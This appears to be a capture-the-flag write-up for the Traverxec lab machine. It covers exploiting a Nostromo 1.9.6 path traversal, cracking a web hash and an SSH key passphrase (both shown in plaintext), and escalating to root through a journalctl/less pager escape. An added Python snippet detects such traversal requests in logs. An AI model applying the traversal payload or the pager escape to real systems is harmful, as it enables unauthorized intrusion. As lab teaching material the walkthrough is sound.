Traverxec writeup

Traverxec - 10.10.10.165



We start with an nmap scan: nmap -p- -T4 -A -oN nmap.txt 10.10.10.165

  • -p- to scan all the ports
  • -T4 to increase the scan speed (T5 is the fastest and T0 is the slowest)
  • -A to run scripts, do version checks on services we find, detect the OS and do a traceroute (this is equal to running -sC -sV -O --traceroute)
  • -oN to save the output just as plain text

We get the following output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

As we can see, only ports 22 and 80 are open. Port 22 runs SSH and port 80 runs the Nostromo web server (version 1.9.6). Searching for Nostromo 1.9.6 shows that it is vulnerable to CVE-2019-16278, and there is a Python script on exploit-db.com that exploits it.

Nostromo 1.9.6 and lower are vulnerable to a directory traversal that leads to remote code execution on the server. Requesting http://10.10.10.165/.%0d./.%0d./.%0d./.%0d./.%0d./ in the browser confirms that this server is affected:
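The request above leaves a recognisable trace in the web server's access log. The following detection logic is an added example (not part of the original writeup): it percent-decodes each request path, strips the control characters (such as the CR from %0d) that the vulnerable check overlooked, and flags any path that still contains a ".." segment. The log lines are constructed, and the check also catches plain and double-encoded "../" traversal, not only the CR-encoded form from this box.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache/nostromo common-log style).
# Line 3 is the CR-encoded traversal from the writeup; lines 4 and 5 are a
# double-encoded and a plain "../" variant added for comparison.
SAMPLE_LOG = """\
10.10.14.2 - - [10/Nov/2019:10:01:12 +0100] "GET /index.html HTTP/1.1" 200 1234
10.10.14.2 - - [10/Nov/2019:10:01:13 +0100] "GET /~david/ HTTP/1.1" 200 52
10.10.14.2 - - [10/Nov/2019:10:01:20 +0100] "GET /.%0d./.%0d./.%0d./.%0d./.%0d./ HTTP/1.1" 200 0
10.10.14.2 - - [10/Nov/2019:10:01:25 +0100] "GET /.%250d./.%250d./ HTTP/1.1" 200 0
10.10.14.2 - - [10/Nov/2019:10:01:30 +0100] "GET /../../etc/passwd HTTP/1.1" 404 0
"""

# Extracts method and path from the quoted request line of a log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def normalise_path(raw_path, max_rounds=3):
    """Percent-decode repeatedly (bounded, to catch double encoding), then
    drop ASCII control characters so that '.\\r.' collapses to '..'."""
    decoded = raw_path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return "".join(ch for ch in decoded if ord(ch) >= 0x20)

def is_traversal(raw_path):
    """True if the normalised path contains a '..' segment."""
    return any(seg == ".." for seg in normalise_path(raw_path).split("/"))

def find_traversal_requests(log_text):
    """Return (method, raw_path) for every log line carrying a traversal."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_traversal(m.group("path")):
            hits.append((m.group("method"), m.group("path")))
    return hits

if __name__ == "__main__":
    for method, path in find_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt: {method} {path}")
```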

Now we can use the Python script from exploit-db. It takes three arguments: <scriptname>.py 10.10.10.165 80 <cmd>. This lets us look around the system. We find the home directory of the user david, but we cannot enter it because we are running as www-data. We can, however, browse the /var/nostromo/ folder, where we find the configuration file /var/nostromo/conf/nhttpd.conf and read its contents:

# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

Here we can see 2 interesting things:

  • there is a .htpasswd file
  • there is a public part to the home directory

First let's look at the .htpasswd file. It contains the hash david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ and cracking it gives the password Nowonly4me.

Now let's have a look at the public part of the home directory. The Nostromo manual explains that a user's public directory is reachable by adding ~<username> to the URL. So we browse to http://10.10.10.165/~david/ and land on an empty page titled "David's homepage".

We already know from the config that the public folder in his home directory is called public_www. Listing it (through the exploit) reveals a subfolder named protected-file-area, so back in the browser we open http://10.10.10.165/~david/protected-file-area/ and download backup-ssh-identity-files.tgz, from which we extract the SSH private key. The key is passphrase-protected, so we first convert it into a format John the Ripper can read using ssh2john; cracking it gives the passphrase hunter. Now we can log on to the machine over SSH with ssh -i id_rsa david@10.10.10.165 and enter the passphrase.

Now we can read user.txt.


Now to root:

The first thing we notice is a bin folder, inside there are 2 files:

  • server-stats.head
  • server-stats.sh

If we read the server-stats.sh file we see the following code:

#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

It looks like we have sudo rights on the journalctl command, but only for one specific invocation: /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service. This limits the output to the last 5 lines, so the GTFOBins technique does not work out of the box.

That technique relies on journalctl handing its output to the less pager. We can force this by making the terminal window very small: the five lines no longer fit on the screen, so journalctl invokes less after all.

From inside less we type !/bin/sh and get a root shell.